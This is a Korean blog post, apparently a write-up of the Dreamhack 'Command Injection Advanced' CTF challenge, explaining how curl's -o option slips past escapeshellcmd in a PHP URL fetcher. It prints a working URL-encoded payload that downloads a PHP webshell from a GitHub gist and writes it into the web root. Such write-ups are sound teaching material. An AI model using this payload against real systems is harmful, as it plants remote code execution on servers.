본문 바로가기

모의해킹/Dreamhack

Command Injection Advanced

728x90

문제 정보

Command Injection 취약점 문제이다. 

 

* 해당 문제를 풀기 위한 알고 있어야 할 것

escapeshellcmd와 curl 명령어

 

문제 정보

URL 주소를 입력해보자.

 

문제 정보

https://www.google.com 주소를 입력을 했을 때, 해당 주소의 응답 값을 가져오는 거 같다.

 

소스 코드

첫 번째로 http가 포함이 되었는지 확인을 한 다음 shell_exec 명령어를 사용해 해당 URL 주소의 결과 값을 html엔티티로 결과를 보여주고 해당 URL 주소를 md5으로 암호화해 cache_file에 저장해 출력해 준다.

여기서 취약점으로 볼 수 있는 곳은 escapeshellcmd 함수에서 \ 문자가 추가되지 않아 curl 명령어의  "-o" 옵션을 사용해 임의의 디렉터리 파일을 생성할 수 있다.

 

문제 풀이

dreamhack에서 제공해 주는 웹쉘 서버를 사용해 문제를 풀 것이다.

 

https%3A%2F%2Fgist.githubusercontent.com%2Fjoswr1ght%2F22f40787de19d80d110b37fb79ac3985%2Fraw%2F50008b4501ccb7f804a61bc2e1a3d1df1cb403c4%2Feasy-simple-php-webshell.php+-o+%2Fvar%2Fwww%2Fhtml%2Fcache%2Fwebshell.php 구문을 사용하였다.

 

curl 명령어 중 "-o" 옵션을 사용해 /var/www/html/cache/webshell.php 경로에 php파일을 올렸다.

 

 

'모의해킹 > Dreamhack' 카테고리의 다른 글

Apache htaccess [WEB LEVEL1]  (0) 2023.05.06
fly me to the moon [WEB LEVEL1]  (0) 2023.05.06
simple_sqli_chatgpt [WEB LEVEL1]  (0) 2023.05.03
CSRF Advanced [WEB LEVEL1]  (0) 2023.05.02
md5 password [WEB LEVEL1]  (0) 2023.04.23